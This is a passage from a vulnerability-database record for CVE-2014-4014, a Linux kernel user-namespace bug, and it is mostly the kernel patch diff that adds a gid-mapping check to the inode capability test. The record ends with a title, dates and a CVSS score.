(capable_wrt_inode_uidgid(inode,\r\n+\t\t\t\t\t\t CAP_DAC_READ_SEARCH))\r\n \t\t\t\treturn 0;\r\n \t\treturn -EACCES;\r\n \t}\r\n@@ -345,7 +346,7 @@ int generic_permission(struct inode *inode, int mask)\r\n \t * at least one exec bit set.\r\n \t */\r\n \tif (!(mask & MAY_EXEC) || (inode->i_mode & S_IXUGO))\r\n-\t\tif (inode_capable(inode, CAP_DAC_OVERRIDE))\r\n+\t\tif (capable_wrt_inode_uidgid(inode, CAP_DAC_OVERRIDE))\r\n \t\t\treturn 0;\r\n \r\n \t/*\r\n@@ -353,7 +354,7 @@ int generic_permission(struct inode *inode, int mask)\r\n \t */\r\n \tmask &= MAY_READ | MAY_WRITE | MAY_EXEC;\r\n \tif (mask == MAY_READ)\r\n-\t\tif (inode_capable(inode, CAP_DAC_READ_SEARCH))\r\n+\t\tif (capable_wrt_inode_uidgid(inode, CAP_DAC_READ_SEARCH))\r\n \t\t\treturn 0;\r\n \r\n \treturn -EACCES;\r\n@@ -2379,7 +2380,7 @@ static inline int check_sticky(struct inode *dir, struct inode *inode)\r\n \t\treturn 0;\r\n \tif (uid_eq(dir->i_uid, fsuid))\r\n \t\treturn 0;\r\n-\treturn !inode_capable(inode, CAP_FOWNER);\r\n+\treturn !capable_wrt_inode_uidgid(inode, CAP_FOWNER);\r\n }\r\n \r\n /*\r\ndiff --git a/fs/xfs/xfs_ioctl.c b/fs/xfs/xfs_ioctl.c\r\nindex 0b18776..6152cbe 100644\r\n--- a/fs/xfs/xfs_ioctl.c\r\n+++ b/fs/xfs/xfs_ioctl.c\r\n@@ -1215,7 +1215,7 @@ xfs_ioctl_setattr(\r\n \t\t * cleared upon successful return from chown()\r\n \t\t */\r\n \t\tif ((ip->i_d.di_mode & (S_ISUID|S_ISGID)) &&\r\n-\t\t !inode_capable(VFS_I(ip), CAP_FSETID))\r\n+\t\t !capable_wrt_inode_uidgid(VFS_I(ip), CAP_FSETID))\r\n \t\t\tip->i_d.di_mode &= ~(S_ISUID|S_ISGID);\r\n \r\n \t\t/*\r\ndiff --git a/include/linux/capability.h b/include/linux/capability.h\r\nindex a6ee1f9..84b13ad 100644\r\n--- a/include/linux/capability.h\r\n+++ b/include/linux/capability.h\r\n@@ -210,7 +210,7 @@ extern bool has_ns_capability_noaudit(struct task_struct *t,\r\n \t\t\t\t struct user_namespace *ns, int cap);\r\n extern bool capable(int cap);\r\n extern bool ns_capable(struct user_namespace *ns, int cap);\r\n-extern bool inode_capable(const struct inode *inode, int cap);\r\n+extern bool capable_wrt_inode_uidgid(const struct inode *inode, int cap);\r\n extern bool file_ns_capable(const struct file *file, struct user_namespace *ns, int cap);\r\n \r\n /* audit system wants to get cap info from files as well */\r\ndiff --git a/kernel/capability.c b/kernel/capability.c\r\nindex a8d63df..24663b3 100644\r\n--- a/kernel/capability.c\r\n+++ b/kernel/capability.c\r\n@@ -424,23 +424,19 @@ bool capable(int cap)\r\n EXPORT_SYMBOL(capable);\r\n \r\n /**\r\n- * inode_capable - Check superior capability over inode\r\n+ * capable_wrt_inode_uidgid - Check nsown_capable and uid and gid mapped\r\n * @inode: The inode in question\r\n * @cap: The capability in question\r\n *\r\n- * Return true if the current task has the given superior capability\r\n- * targeted at it's own user namespace and that the given inode is owned\r\n- * by the current user namespace or a child namespace.\r\n- *\r\n- * Currently we check to see if an inode is owned by the current\r\n- * user namespace by seeing if the inode's owner maps into the\r\n- * current user namespace.\r\n- *\r\n+ * Return true if the current task has the given capability targeted at\r\n+ * its own user namespace and that the given inode's uid and gid are\r\n+ * mapped into the current user namespace.\r\n */\r\n-bool inode_capable(const struct inode *inode, int cap)\r\n+bool capable_wrt_inode_uidgid(const struct inode *inode, int cap)\r\n {\r\n \tstruct user_namespace *ns = current_user_ns();\r\n \r\n-\treturn ns_capable(ns, cap) && kuid_has_mapping(ns, inode->i_uid);\r\n+\treturn ns_capable(ns, cap) && kuid_has_mapping(ns, inode->i_uid) &&\r\n+\t\tkgid_has_mapping(ns, inode->i_gid);\r\n }\r\n-EXPORT_SYMBOL(inode_capable);\r\n+EXPORT_SYMBOL(capable_wrt_inode_uidgid);\r\n-- 1.9.3\r\n\r\n", "modified": "2014-06-17T00:00:00", "published": "2014-06-17T00:00:00", "id": "SECURITYVULNS:DOC:30889", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30889", "title": "[oss-security] CVE-2014-4014: Linux kernel user namespace bug", "type": "securityvulns", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
